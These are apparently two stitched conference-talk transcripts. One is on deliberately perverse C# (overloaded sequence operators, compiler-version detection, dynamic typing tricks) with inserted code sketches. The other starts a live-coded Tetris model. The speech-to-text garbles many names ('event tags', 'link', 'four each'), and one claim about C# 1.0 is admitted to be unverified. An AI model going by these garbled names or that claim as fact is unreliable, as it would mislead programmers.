plus operator and we've got the unary minus operator. Now, when I was first coming up with this code, I asked various people on Twitter what they would want to do with the unary minus operator. So that's the operator that is not x minus y, but just minus y. I've closed this so that you can come up with some ideas of your own. Any suggestions? Backwards? Okay, reversing? Yes, that's one option. Shifting? I've got shifting as the shift operators because those feel kind of sensible. Put it this way. I think shifting with the shift operators makes a lot more sense than writing to a stream or reading from a stream. What kind of crazy language would do that? So, yeah, not shifting, but someone suggested element-wise negation if they're integers. We can just negate them. And someone else suggested something truly hideous which is it should pop. It should return one element and remove it from the thing that it's operating on. Never, ever, ever, ever do this. So, just generally, operators shouldn't change the thing that they operate, their operands. So, we've got three different ideas there, reversal, negation, and popping. Now, the unary minus operator doesn't take any operands other than the thing it's working on. So, if we've got three different potential operations, we need some way of switching between them. So, this is what the unary plus operator does. 
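Continuing the same idea before the unary operators are resolved, a sketch of the division, remainder and shuffle operators walked through above, on a separate minimal wrapper so the snippet stands alone: dividing by a delegate groups, dividing by an int yields whole batches, % hands back the leftovers and ~ shuffles.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

class EvilSequence
{
    private readonly IEnumerable<object> source;
    public EvilSequence(IEnumerable<object> source) { this.source = source; }

    // Division by a key selector behaves like GroupBy.
    public static IEnumerable<IGrouping<object, object>> operator /(
        EvilSequence src, Func<object, object> keySelector)
        => src.source.GroupBy(keySelector);

    // Division by an integer batches, keeping only complete batches...
    public static IEnumerable<IEnumerable<object>> operator /(EvilSequence src, int size)
        => src.source.Select((item, i) => new { item, i })
                     .GroupBy(x => x.i / size)
                     .Where(g => g.Count() == size)
                     .Select(g => g.Select(x => x.item).ToList());

    // ...and the remainder operator hands back whatever did not fit.
    public static IEnumerable<object> operator %(EvilSequence src, int size)
    {
        var items = src.source.ToList();
        return items.Skip(items.Count / size * size);
    }

    // Bitwise negation as "a bit here and there": a shuffle.
    public static EvilSequence operator ~(EvilSequence src)
        => new EvilSequence(src.source.OrderBy(_ => Guid.NewGuid()).ToList());
}

class Demo2
{
    static void Main()
    {
        var digits = new EvilSequence(new object[] { 3, 1, 4, 1, 5, 9, 2, 6 });
        foreach (var batch in digits / 3)
            Console.WriteLine(string.Join(" ", batch));   // 3 1 4 then 1 5 9
        Console.WriteLine(string.Join(" ", digits % 3));  // 2 6, the leftovers
    }
}
```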
Imagine that we have, we've got an enum of reverse negate pop, reverse negate pop, and we can just cycle between them. And I think it starts off by default it reverses. And if you use the plus operand, that returns a new one. It's not crazy enough to mutate the existing one. It returns a new one that has the next kind of behavior for the unary minus operand. So, if we start with, these are just the first few digits of pi. When we print them out, we'll see 3, 1, 4, 1, 5, 9, 2. A single minus will just reverse. But if we use plus sequence and then use minus on the result, who would have thought this would even be valid? Yeah? Then, it will negate each thing. Unfortunately, we can't do plus plus sequence in order to advance it by 2, because that would use the plus plus operator. Out of interest, let's see, does this work? The operand of an increment must be a variable property or indexer. No, I don't think it's liking that. So, we could potentially make the plus plus operator. Let's just change what the plus plus operator does to make it return plus plus sequence. And then, we might be able to get triple plus to work, which would be awesome. Okay, so that's a reasonably simple, oh, it's still not liking it. So, we can do that. And now, we can just do plus plus sequence and it'll do the same thing. Yeah? So, I think you can do these in as many batches of 2 as you want. Oh, no, no, it doesn't like using plus plus on something else. So, we'll have to make do with these two. But we can probably get rid of one bracket there. There we go. Right. So, when we've done plus plus sequence, it will now go into popping mode. And each time we call minus popping, it will return one element and remove it from the current thing. So, when we print out popping, so we'll have popped. I can't remember which end it pops from. But we'll have either removed 314 and it'll print 1592 or we've removed 295 and it'll print 3141. And then, if we reverse the, if we take the original sequence and go through one addition to get to negation, one addition to get to popping, and then one addition, it should go back to reversal. So, when we then do the unary minus operator of that, it should just print out the reverse so 2951413, et cetera. Let's see. Unary operators, 314. Okay. So, pop takes it from the start. And it all works. Of course, we could change the minus, minus operator to do minus, minus, which in the case of popping would be bizarre in all kinds of ways, actually. In the case of reversal would do nothing because it would reverse it twice. And in the case of negation, it would also do nothing or go bang when you tried to print it depending on whether you were actually printing numbers or not. Sorry. The last reverse didn't work. Let's check that. I'm sure you're right. But the unary operators. Oh, you're right. What's going on there? Yeah, but when we take plus, plus sequence, the plus operator does take a copy. Or it should, at least. Yeah. Let's take, so something is badly wrong here. So, this is now no longer using our crufty right. Yep. No idea what's going on there. Might have a look later on. What does this do? There's no reason why that shouldn't work that I'm aware of. Okay. Bizarre. So I think we've probably proved that Eric Lippert was right. And this isn't a strictly speaking good idea. Right. Any other? Oh, yeah. You can multiply two sequences together. And you get cross multiplication. So this will do a1, a2, a3, b1, b2, b3, c1, c2, c3, I think. Yep. 
I've already mentioned the shift operators for rotation. So you could make the shift operators or at least you could make right shift get rid of things in the same way that right shifting an integer loses information. But no, I just rotate the whole thing. Inverse. Oh, yeah. So not of a sequence. This is quite fun. So what does not of a sequence mean? I've defined it to be sort of an inverse of the possible sequence. So it's not something that on its own is useful. But when you add another sequence to it, it removes all of those things. It's sort of like dark matter. It will obliterate anything else. So when we've got, when we add the range 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 to the inverse of the first seven digits of pi, it will only produce those digits which aren't in the first seven digits of pi. If I remember rightly. There we go. 0, 6, 7, 8. Okay. I think that's probably enough linked operators. How am I doing for time? Fine. So that was the not operator. Not on a sequence. I've got two ones. Yes, it's treated as a setwise inverse. Basically, because I didn't want to rewrite everything and I just wanted to use except, the normal except link operator. Are there any other operators you would like to see? I can't think of any I've missed off at the moment. Oh, there's true and false. So you can do if sequence and other sequence. Sorry? Is there a, oh, is there an exclusive OR operator? I'm sure there is. Let's see what it does. Exclusive OR. Oh, is except. So it returns elements that are only in one of the two sequences. So, you know, exactly as you'd expect. Think of it as bitwise and just I'm doing it with sequences. So let's show that. So, foo bar bars.evil.exor2. So I reckon this should print foo bars quucks. After the stuff that came before. Yeah, foo bars quucks. I've shown pipe and and just looking at the top of the keyboard. Yeah, that looks like it's all the operators available. Always worth playing around. Okay, so quiz time. Next thing is version detection. So this is where I tried to stump the C sharp team and it was quite fun. C sharp has had how many versions? Pardon? It's had six versions. 1.0, 1.2, 2.0, 3.0, 4.0 and 5.0. And the C sharp team is very keen on backward compatibility. So ideally, any program that previously compiled, if you compile it with a new version of the C sharp compiler, it should do the same thing, right? So I took this as a challenge to break C sharp and try to come up with a program that would compile on not necessarily all versions of C sharp, but in order to compare any two versions, it should compile on both the old and the new and give different results. So I've hidden them here so that we can see if anyone can work out any differences. My guess is that you won't get the first one. How can we detect the difference between C sharp 1.0 and 1.2? And I have no idea why it wasn't 1.1. Any ideas? Okay. I have it on some authority that in C sharp 1.0, when you use a for each loop, okay, let's rewind a little bit, when you use a for each loop, it calls get enumerator. Yes, happy with that. And whatever is returned by get enumerator, so the I enumerator usually the non-generic I enumerator that was present in dot net 1.0 didn't implement I disposable. I believe ish that in C sharp 1.0, that enumerator was never disposed. 
Whereas in C sharp 1.2, conditional code was added saying if the enumerator happens to implement disposable, then dispose of it at the end of the for each loop, just like it does for I enumerable of T, where I enumerator of T implements I disposable. Really important so that finally blocks in iterator blocks execute, okay? So in order to detect the difference, we create our own funky class which implements both I enumerable and I enumerator because we don't care. We're just going to say it doesn't have any values and it's its own enumerator. All it's going to do is remember whether or not it was disposed. We're going to for each over an instance of it and return whether or not it was disposed. Now I've been somewhat cautious about this saying, you know, I think this is the case. I looked at the specification. It's relatively hard to even find the C sharp 1.0 specification and the diff isn't terribly helpful. But I believe the 1.0 spec does say that it should dispose. And I have this idea in my head that it doesn't. It's quite hard. It's hard enough to get hold of the spec. It's really hard to actually get hold of the C sharp 1.0 compiler because it won't install on any modern operating systems. I need to find someone with XP and see if I can install it on that. So what do you normally do if you believe something to be true and you want to check it and you can't prove it directly? I can wait here all day. Pardon? You can ask on Stack Overflow. In general, you can search the web, right? And I did find a number of references stating that this is the case. Unfortunately, they were all me. So I'm not going to claim that this is definitive. I really, really want to see this in action sometime. I must have got the idea from somewhere. That's kind of all that's giving me hope at this point. Okay. So that's 1.2 to 1.0. What about C sharp 2 and C sharp 1.2? So we can't use generics or anything like that because we know that that just wouldn't have compiled in C sharp 1.2. So can anyone think of any differences in C sharp 2 that you'd be able to detect? Pardon? Events? What about events? Sorry, shout out loud. Yeah, events themselves existed before. You're along the right lines. It's around delegates or at least the thing I'm thinking of is around delegates. That man is right. Give that man a prize if we have one. So the gentleman said it's covariance and contravariance of delegates. So when you create a delegate back in C sharp 1, remember we've got to do the new event handler stuff. We can't just do button.click plus equals do stuff. It's got to be button.click plus equals new event handler do stuff. And in C sharp 1, the signatures had to match absolutely correctly. So if you had a mouse move handler, in order to create a mouse move handler, you had to have a method that took mouse move event tags. In C sharp 2, you can have something that takes just event tags on the grounds that anything calling it as a mouse move handler and passing in a mouse move event tags, or mouse event tags, whatever it is, that's going to be fine and valid. So, okay, we know that one conversion isn't valid in one case and is valid in another. How can we use that to prove which version we've got? We can't use is because we've got to have something that compiles first. Pardon? We can't cast, so we've got to have some code that does new some kind of delegate type and pass in a method. How can we differentiate? I'll show you. It's the same trick that we're actually going to use in various different cases. 
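The 1.0-versus-1.2 detector he goes on to describe is something along these lines — a deliberately old-fashioned class (no generics, no auto-properties) that is its own empty enumerator and just records whether foreach disposed it; whether the C# 1.0 compiler really skipped the Dispose call is, as he says, unverified:

    using System;
    using System.Collections;

    class DisposalDetector : IEnumerable, IEnumerator, IDisposable
    {
        public bool Disposed = false;

        public IEnumerator GetEnumerator() { return this; }

        public bool MoveNext() { return false; }   // empty sequence: the loop body never runs
        public object Current { get { throw new InvalidOperationException(); } }
        public void Reset() { }

        public void Dispose() { Disposed = true; }

        static void Main()
        {
            DisposalDetector detector = new DisposalDetector();
            foreach (object item in detector)
            {
            }
            // C# 1.2 and later emit a finally block that disposes the enumerator.
            Console.WriteLine(detector.Disposed ? "C# 1.2 or later" : "C# 1.0");
        }
    }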
If we have a base class with just the general version, so the event tags version, and a subclass, oh, sorry, in fact, no. Why don't I make this something more familiar? Mouse event tags, mouse move event tags. Oh, someone tell me what the, sorry, add a reference to WinForms. There we go. And that one takes event tags. So, here we have a general one and we're going to do new, where is that event? No, I was fine before. Okay. Ignore me. Right. So, imagine the mouse move event tags and event tags but taken up a higher level. If you've got a method that can take any object at all for the second parameter, it can definitely take an event tags. So, if we try to use just normal event handler, so the signature of event handler is object sender event tags, args. If we try to create this from derived, so we're creating an instance of derived and the compile time type is also variant derived, so we've got this. And we say create me an event handler using the foo method. In C sharp 1, the compiler would first look at this foo method and say, no, I can't use that. That second parameter is wrong. Tell you what, I'll look at the base class instead. And then it finds something, so it ends up using the right, it ends up using this base implementation. The C sharp 2 compiler says, no, that's fine. I can use this more derived method. These are two separate methods. This isn't overriding. This is overloading. I can use this, the second method because object tags is compatible. This signature is compatible with the signature of the delegate. So, all we need to do is see which one is called. And basically, we assume it's false. And if the derived version is called, then we call it with true. Okay. How about C sharp 3? The way that generics behave, can you give more details? In respect to contra variants and covariants, no, that was C sharp 4. So, the.NET runtime has had support for generic covariance and contra variants back since.NET 2, but C sharp as a language only allowed out and in C sharp 4. But, you're close. It is around generics. Anything else happen in generics in C sharp 3? Pardon? Type inference. Yes. Give that man a teddy bear. So, in C sharp 2, type inference was pretty dumb. Haskell and F sharp people will say it's still pretty dumb in C sharp 3 onwards, but it was really pretty dumb in C sharp 2. So, you had a bunch of parameters and a bunch of type parameters. Are we all clear on the difference between a type parameter and a normal parameter? Yeah. So, if you had a generic method with one type parameter, T, and two actual parameters, both of which were of type T, then type inference would try to work out T from each of the arguments that you passed and then say, are those all correct? Do they all match? Exactly. In C sharp 3, it takes a much more sort of heuristic view of things, holistic rather. And it says, well, I'll look at all the arguments you've given me and work out what kind of constraints I've got and then try to find something that matches all of those. So, I'm going to try to find all of those, but they don't have to, we're not trying to work out the whole of everything about T from each argument individually. So, that exact example that I gave, we've got a foo of T that takes T for both parameters. And as our sort of backstop, let me just undo this. If I comment this out, we're going to try to create, we're going to try to call foo with an object and a string. So, in C sharp 2, it would say, hey, I know what T is, it must be object for the first argument. 
And then the second argument would say, I know what T is, it must be string. And then the two of them would look at each other and say, you're wrong, I know best, compile time error. So, if we would try to compile this code now on a C sharp 2 compiler, it would blow up. Now, I've said we don't want it to blow up, we want it to compile and then do something different. So, let's add an overload to keep these two arguing arguments happy, didn't think of that before. To stop them from arguing, we'll say, you can do T1, you can do T2, they can be completely separate, it's all right, you don't have to share. So, the first argument says, right, T1 must be object. And this one says, two must be string. And they look at each other and say, that's fine. But in C sharp 3, it will still prefer this version because overload resolution first looks at the most derived class and says, right, can I find anything in there that will match? And it says, yes, T can be object because string is an object, so that's fine, so I'll use that overload. So, again, all we need to do is return true or false. Happy? Okay, you've done pretty well so far, I have to say. C sharp 3 to C sharp 4, I haven't got it in this file, I've got a slightly separate file. Any ideas? Scoping of, hold that idea for later on, but this is C sharp 3 to C sharp 4. You're absolutely right, I'll come back to you for C sharp 4 to C sharp 5. Anyone, what are the differences in C sharp 3 and C sharp 4? What were the features of C sharp 4? Named parameters, yes, or named arguments, and their partner in crime, optional parameters, yes. How long have optional parameters been around in.NET? Since the beginning, yes. So, if we have a separate assembly, so we compile this with, this has to be compiled with the C sharp 4 or up compiler, but it can still target.NET 2, so we're still going to be fine to use the C sharp 3 compiler to compile something that refers to this assembly, and look, it's the overloading and base class trick again. So, all we're going to do is call detect defaulting without any arguments, and that will be entirely valid to do whether we're using C sharp 3 or C sharp 4. It's just it'll use a different overload. So, this is worth, I said you wouldn't get anything useful out of this, it's just possible that this could actually come up in reality if you've got, say, a visual basic assembly that you are referring to. It can happen, and it's got this sort of structure, then if you're compiling with C sharp 3 and C sharp 4, you could get radically different results. And again, we just return false if we haven't got defaulting and true if we have. Okay, so that's C sharp 3, C sharp 4. Finally, C sharp 4 to C sharp 5. You had a great idea, sir. Yeah, they've changed the scoping of variables. They've changed the scoping of variables in which particular loop? In four each. In four each, yes. So, the way that the iteration variable of a four each loop is captured by an anonymous function, whether that's a lambda expression or an anonymous method, has changed in C sharp 5. Entirely silently, and this is worth knowing if you're an open source developer, if you've got some developers using Visual Studio 2010 and some using 2012, then someone could check in code that works fine against their compiler and will fail silently with the 2010 compiler because it will still be valid code, just something that does the wrong thing. 
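Before the C# 4/5 case, here is a sketch of the two detectors just walked through — the C# 1.x/2 delegate-variance trick and the C# 2/3 type-inference trick — both riding on overload resolution preferring an applicable method in the most derived class (member names are mine, not the original demo's):

    using System;

    class VarianceBase
    {
        public static bool UsedDerived;

        // Exact signature match: the only method C# 1 could bind the delegate to.
        public void Handler(object sender, EventArgs e) { UsedDerived = false; }
    }

    class VarianceDetector : VarianceBase
    {
        // C# 2 allows this contravariant signature to back an EventHandler,
        // and prefers it because it lives in the more derived class.
        public void Handler(object sender, object e) { UsedDerived = true; }

        public static bool Run()
        {
            VarianceDetector d = new VarianceDetector();
            EventHandler handler = new EventHandler(d.Handler);
            handler(null, EventArgs.Empty);
            return UsedDerived;
        }
    }

    class InferenceBase
    {
        // C# 2 inference cannot agree on a single T for (object, string), so it lands here.
        public bool Detect<T1, T2>(T1 first, T2 second) { return false; }
    }

    class InferenceDetector : InferenceBase
    {
        // C# 3 infers T = object, and the derived overload wins.
        public bool Detect<T>(T first, T second) { return true; }

        public static bool Run()
        {
            object o = new object();
            string s = "hello";
            return new InferenceDetector().Detect(o, s);
        }
    }

    class VersionDemo
    {
        static void Main()
        {
            Console.WriteLine(VarianceDetector.Run() ? "C# 2 or later" : "C# 1.x");
            Console.WriteLine(InferenceDetector.Run() ? "C# 3 or later" : "C# 2");
        }
    }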
So, here we have, in C sharp 4, there was one variable, so our bool value would be as if it were declared outside the loop, and then it would then take on each value within the sequence as we went along. And when you captured that variable, it captured the single variable, even if you captured it several times. So, when you look at the end, if you use that variable that's captured after the loop has finished, you will always see the final value. In C sharp 5, it's different and much saner, we get a separate value variable for each iteration of the loop, so we're capturing that, and then we're just going to see at the end what happens if we find out what the variable, the variable that we captured on the first iteration of the loop, what's its value now? And in C sharp 4, we've only captured one variable, so it would have a value of false. In C sharp 5, we'd have captured only the variable associated with true, so it would still have a value of true. Right. All happy with version detection? I should point out these are corner cases, and in the case of at least the variance of delegates, the compiler would normally warn you saying, hey, this behavior has changed between C sharp 2 and C sharp 1. I think for type inference, it might do as well, I'm not sure, I think I've disabled all the warnings to avoid giving hints. Okay, finally, and this is actually in some ways my favorite because it's the most elegant, oh no, we've got loads of stuff to do, and not much time. Okay, let's give you a crazy thing to start with. Right, what's that code going to do? We haven't got much time, come on, what's this code going to do? Sorry? It will print out 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, sorry, not 10, 0 to 9, yes. I don't want it to go up to 10, I only want the first five numbers. So we'll just do limit equals 5, is that okay? Well, yes, it is okay. But this output is a bit boring, it may be a little bit harder to read from the back. So let's put the current value of x is, is that going to be clearer? Let's see. Yeah, that's clearer now, it says 0, 1, 2, 3, 4. So you can see that this is a perfectly simple project. What's going on? Implicit operators, well, but where are these operators coming from? Far is a class, ah, it's a class that's sneakily hidden within assembly info.cs. And yes, there is an implicit operator to var from both string and number, string and int. And when we, when there's also an implicit operator to two int, so when we printed out console.writeLine, console.writeLine, let me see whether hovering shows what's going on. Yes, it does. Right. So if I hover over this, probably shows two small c, but it's showing that it's using console.writeLine int. Even though the type of x isn't int, there is an overload, sorry, there's an, an implicit conversion to int, and the overload that takes an int is more specific than the overload that takes object, which is the only other one available for this. On the other hand, when we use this form, because we're using, you know, standard formatting, this is now going to call to string. It doesn't know that there is an int conversion. That was very impressively quick, I have to say. Okay. Something slightly similar. I have two bits of code that look very similar. So we've got some mystery class, and we're going to call getValue on it. And it's, you know, dynamic. We, we don't know exactly where this count method is going to come from, but we're using system.link, so, you know, maybe that'll work. 
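The foreach-capture detector for C# 4 versus C# 5 can be as small as this (again a reconstruction, not the slide code):

    using System;
    using System.Collections.Generic;

    class CaptureDetector
    {
        static void Main()
        {
            List<Func<bool>> captured = new List<Func<bool>>();
            foreach (bool value in new[] { true, false })
            {
                captured.Add(() => value);   // capture the iteration variable
            }
            // C# 4: one shared variable, so the first delegate now sees the final value (false).
            // C# 5: a fresh variable per iteration, so the first delegate still sees true.
            Console.WriteLine(captured[0]() ? "C# 5 or later" : "C# 4");
        }
    }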
Demo two doesn't have system.link, so the count method better be a method, right? Doesn't really matter exactly what the output is, other than the fact that I'm running the wrong project. When I do demo one, it prints three. When I run demo two, it prints ten. Any ideas what can be going on such that just adding using system.link makes a difference here? Lots of answers, but shout out because I can't actually hear details of any of them. Dynamic is a class as well. Where? Importantly, it's in the system.link namespace. It gets a bit funkier than that, though. So mystery is declared to, is statically declared to return a system.link.dynamic. Okay, so even though we don't have, in demo one, demo two rather, even though we don't have a using directive for system.link, it's declared to return a system.link.dynamic, but we're just using dynamic, the real dynamic. So when we call x.count, it's really trying to find the count method, which it finds, finds from here. So we have one class called the system.link.dynamic, and it's called the real dynamic. So when we call it, it finds from here. So we have one class called dynamic, and then a subclass called static. So actually, in this case, the static type of the return of get value is dynamic, but the dynamic type, the runtime type, is static, just for a bit of fun. So count returns 10, and it finds that using dynamic typing. In demo one, we know about system.link, so dynamic here refers to the class. But we've also got an extension method, the normal innumerable extension method. So this is now calling the standard extension method, because dynamic also implements a number of int, and we're yielding three things. So even though we're not calling the statically typed thing is calling an extension method, and the dynamically typed thing is calling the actual, you know, really known count method, partly because dynamic typing can't call extension methods, and partly because it knows that the type is actually static. So that's a little bit of funkiness, and I have four minutes to show wrapping async. It's a shame. I'll probably keep you all a bit longer. Feel free to leave when you need to though. Right, so let me give an example. Async is a sort of, I think it might be called a co-monad, but async has something in common with normal link, and indeed with nullable of t. They're all about wrapping and unwrapping. So nullable of t, I can write nullable int x equals 10, and the compiler will wrap the int into a nullable int. Yeah, and I can use an explicit conversion to unwrap it back to an int. In link, we deal with one value at a time, you know, our select clause or where clause or whatever thinks of one value at a time, and things are unwrapped and wrapped to deal with sequences. In async, not always to do with task, but in general, we'll think of task, you write code that deal with non tasks by using a wait on a task to do unwrapping, and then if you return a normal value, you return an int, and your method is declared to return a task of int. The compiler does some wrapping for you. That's all good until you've got multiple things. So I've got a service that will give me multiple details about a person. It will get me their weight, their name, and their age, their birth date. Each of those is going to be a task. Okay? Imagine I don't have a class that describes all of these things. I can do this, but now I've got, I've got to have these three variables and then separately create that, and it's a bit of a pain. 
I like this anonymous type because it wraps these related fields together. Imagine we had a tuple instead of those tasks, and we would like somewhere of unwrapping from a tuple of task t1, task t2, task t3 to a task of tuple t1, t2, t3. So it's sort of switching around the tupleness and the taskness. Do you see what I'm saying? We can do that easily. We can write our own little transpose method that basically says take these three tasks, when they've all finished, return a tuple with all the results. And this uses task completion source. We could actually, we could write this using async and just return a task of tuple t1, t2, t3 by awaiting all three. So that's nice-ish. We can then start doing it implicitly by having an extension method on tuple task t1, task t2, task t3 called get-awaiter. So we have, we have transposers that, the slow way of doing, or you know, the explicit way of doing things. And then if we call get-awaiter, we will just call transpose and then call the get-awaiter that's returned by the task. Async is pattern-based for the await part. Therefore, the compiler sees that, okay, tuple of task t1, t2, t3 doesn't have a real get-awaiter method, but it has this extension method, so I'll call that instead. Next, and I'm sorry, I'm rushing this a little bit. If we have an anonymous type, and the nice thing about anonymous types and what I don't like about tuples is we get to see what these things mean. Wait, name, and birthday have meanings. Item one, item two, item three don't, right? So tuple is, is kind of great for coupling things together.
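The tuple-of-tasks transposition and the extension GetAwaiter he is describing can be sketched like this; the person-service methods are hypothetical stand-ins for whatever the real service exposes:

    using System;
    using System.Runtime.CompilerServices;
    using System.Threading.Tasks;

    static class TupleTaskExtensions
    {
        // Tuple<Task<T1>, Task<T2>, Task<T3>>  ->  Task<Tuple<T1, T2, T3>>
        public static async Task<Tuple<T1, T2, T3>> Transpose<T1, T2, T3>(
            this Tuple<Task<T1>, Task<T2>, Task<T3>> tasks)
        {
            return Tuple.Create(await tasks.Item1, await tasks.Item2, await tasks.Item3);
        }

        // await is pattern-based, so an extension GetAwaiter is enough to make
        // "await someTupleOfTasks" compile.
        public static TaskAwaiter<Tuple<T1, T2, T3>> GetAwaiter<T1, T2, T3>(
            this Tuple<Task<T1>, Task<T2>, Task<T3>> tasks)
        {
            return tasks.Transpose().GetAwaiter();
        }
    }

    class TransposeDemo
    {
        // Hypothetical stand-ins for the person service mentioned in the talk.
        static Task<double> GetWeightAsync() { return Task.FromResult(75.5); }
        static Task<string> GetNameAsync() { return Task.FromResult("Jon"); }
        static Task<DateTime> GetBirthDateAsync() { return Task.FromResult(new DateTime(1980, 1, 1)); }

        static async Task Main()
        {
            // Await a tuple of tasks directly and get a tuple of results back.
            var person = await Tuple.Create(GetWeightAsync(), GetNameAsync(), GetBirthDateAsync());
            Console.WriteLine("{0}, born {1:d}, weighs {2}kg", person.Item2, person.Item3, person.Item1);
        }
    }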
|
We've all seen bad code. Code worthy of the Daily WTF. Code which makes us wonder how products ever ship, let alone work. Bad code is boring. Evil code is entirely different. It's bending a language in ways that would make the designers weep. It's code which you stare at and swear that it can't possibly work... until you see how it does.
|
10.5446/51452 (DOI)
|
Hello everybody, we're going to get started. Welcome. I'm a quick introduction and we'll just get straight to the code. For those of you wondering what the heck is TechPub full throttle, I'm Rob Connery, I work at TechPub, that's what I do, make videos. Everyone knows who he is, John Skeet. We have a series of TechPub where basically we have a small single problem when we get a developer that knows what they're doing and we say, do it and they start coding and I start recording what they're doing. Then I throw curveballs at him and make him do all kinds of silly stuff. The one person that's been missing in our full throttle cannon, if you will, is John. The reason is I have no idea what John's doing. It's impossible to throw curveballs at him. I thought today that maybe I'd make him code in Esperanto or something. Or I don't know, Erlang? JavaScript, Ruby, Python. Pretty much you name it, Python, C-sharp and Java and I have no idea. Right. It's actually an interesting problem coming up with, what are we going to have John code? The first idea was wouldn't it be fun to have him re-implement SignalR and laugh at Damien Edwards and David Fowler as he does it in 100 lines of code. But guess what Damien and David are doing tomorrow? They're actually going to code live on stage and re-implement SignalR. So we can't do that. Anyway, I was talking to John and we came up with the idea of a thing he started doodling on one night, which is Tetris. At first I was like, that's stupid. But he started explaining it to me and I was like, that would be fascinating. So, to give you a little bit of ground rules here, I'm going to lay down the thing to him. He's going to start coding and I'm going to basically comment on what he does, but I'm going to give him about 10 minutes before I don't know what he's doing. So with that, what we're going to do is Tetris, make a little Tetris game in Visual Studio, in C-sharp of course. Five? Yeah, of course. I've been working on my Skeet impression. Well, let's go. You like that? Scottish, yes. What the f*** was that? I can't swear, so there's no Scottish. Anyway, so are you ready, sir? Yeah, well, except that you were saying about, you know, you get someone who knows what they're doing. I have no idea, I have very little idea of what I'm doing on this one. Oh, yeah, okay. We'll see how we get. Yeah, okay. How about it? So just to give a little bit of background on this, when Rob said I was doodling on this one night, about five or six years ago, when I was working for a very different company, I'd finished one project, and it was the company party that night, and then maybe I was going on holiday, really didn't want to start on something new. And it was like, it was four o'clock, I was going home at five, there was no point in me doing a new bit of work. So I said to my team leader, is it okay if I just have a go at writing Tetris? He said, yeah, go on then. And I just about got it done in the hour as a console app. And it was probably horribly architected, because it was just doodling then. And I thought it might be fun to try to write, ideally, if time slows down, and I can just code like crazy, to have one model, view model, whatever, that we can then put a console app on, and a WPF app on by the end of the hour. Yeah, well that's the goal. We're not going to go there. Well, we could try, because the goal is that I'm going to try and talk while you code full speed. And that's going to be the fun part. 
And you can see I'm using test-driven development in that I've created a project called Tests, which will now remain empty for the rest of time. I'll teach you that. At least test folder driven. So we'll start with the model. I haven't written any of this code myself yet. I was talking to another speaker in the speaker room. Stuart, are you around? Yeah. Excellent. And we were sort of just noodling on this a little bit and trying to work out what would be involved and whether there was a model and a view model that are easily distinguishable in a normal MVVM, WPF, silver-lighty kind of way. And so at this point that I say, I'm really not an app kind of guy. I don't do GUIs. I'm a class library person. So give me an API to design and I can do it. So I'm going to start off on the raw model side, because that's where I feel I have some strength. And we'll see where that goes. How much view model do we really need? Can we put a view actually straight on the model and it still be portable enough? I thought we might have a go at doing this kind of functionally-ish. So let's keep things immutable where possible. Does that seem reasonable? The state of the game feels like something, at any one point, something's going to happen, whether that's time passes and a piece drops a bit, or the user says to move it left or right or do whatever. And it feels like that's a really quite straightforward, straight state transition. I think that sounds totally good unless things go pear-shaped. Wait a second. Okay. I need a drink. Okay, so what is the state of the game? We will have, in all of this, I'm going to write automatically implemented properties simply because it's simpler than writing read-only fields backed by a read-only property. So when I write something like game state, get private set, imagine I'm writing game state, get return. Pseudo code is really hard in Visual Studio because it just wants to complain at you all the time. Game state with a private read-only game state. Okay, it's a real pain that C-Sharp doesn't provide a nice way of doing this backed by a read-only field, but I just haven't got the time right now. I think it is C-Sharp, not Java though. I think the thing, yeah. Yeah, C-Sharp is still better than Java. I publicly acknowledged this morning, Java is better than C-Sharp in one way, which is enums. It has decent enums. However, we have logically a game state of active dead paused. So we would like to be able to pause the game. And while the game is paused, time can happen and nothing will happen. I think probably if user activity happens, we could decide that that is broken on the part of whatever's interacting with the API, but we'll see. But definitely it shouldn't do anything. The only thing that should unpause you is the unpause action. We could put interfaces around all of this. We won't right now. So a game will have a width, no, a game will have a board. And a board will have a width of height. So it seems like you're thinking about this from the visual angle. How would you play Tetris and you're seeing it, and you're starting from the outside in? Games have sort of, the underlying model is fundamentally visual, I would say. But it doesn't say anything about how we're going to display this. We could display it by hand somewhere with marbles or whatever. But we will have a board and I'm going to have a... What I really like is an immutable array at this point. But what I'll do is keep a... 
Let's hang on, another enum for each square on the board, not including the piece that's dropping. So that feels like it's, if you imagine layers, you've got the layer that already exists and then the piece that's dropping down. And I think it would be a mistake to include this piece as part of the current state. It will make it really hard to move it around because it's almost certainly going to, when we do collision detection, it would almost certainly collide with itself when you try to move it down. So that's not good. So we'll have the sort of background layer, the board, set in stone board layer, and we'll have another enum, which will be, I'll call it tile state. Okay, and we'll have none. And different, these happen to be colors, but they're arbitrary user differentiable bits of tile state. And it's either there's an empty space, in fact, let's call this empty. And how many different shapes are there? Seven, yeah? Yellow, orange, white, and cyan, whatever. Arguably, these are just seven different things. They can be mapped onto icons. They can be mapped onto colors. We might want to explicitly state that they are not inherently colored. They are just different templates. And so a board has underlying it, I think it has an array of tiles. But I'm not going to give access, unlike the game state where I've allowed you to access the state directly. We want to be immutable. Arrays are fundamentally mutable. There's nothing we can do about that. So instead, let's just put an indexer onto this, onto the board itself. Oops, okay. Return tiles x, y. Okay, I will rely on the array itself doing argument validation. So we'll get an array index out of bounds exception for a really polished API. I might make it to an argument out of range exception instead. Arguably, if you're using an indexer, I think array index out of bounds exception is arguably the wrong level of abstraction within.NET itself. If it had just been an index out of bounds exception, it would be entirely reasonable for the indexer to throw it. So it's a shame that the.NET framework guys didn't think of that just because it's an array. Why is an array a special case? So at some point we'll need to initialize that. We should definitely have the width and height. Okay, and this is complaining. Oh, yeah. So this needs to be public. So let's think about what we want to be able to do on our game. We want to be able to start a new one. And I've become quite a fan of factory methods, static factory methods, rather than constructors or rather invoking constructors under the hood. But it's quite nice to have named methods. Speaking of games, did I mention that this has to be a singleton because there's only one game at a time? No, why would there possibly be only one game? It's my fourth rattle, man. We're doing it immutable. If we have an immutable singleton, this is going to be a really boring game. You can't do anything on it. All right. Sorry, John. On the other hand, I can do this and then we can go down the pub. No to self. Don't mess with Skeet. I take it back. So we can start a new game and I think all we really need for a new game is a width and a height. Okay, I'll fill in stuff later on. It won't build for a while. What else do we want to be able to do to the game? Pause. Thank you. Public game. Pause. And so I think for that we can return a new game. So this is where the fact that I'm cheating with read-only properties, sort of pseudo read-only properties, actually makes this rather simple but not necessarily thread safe. 
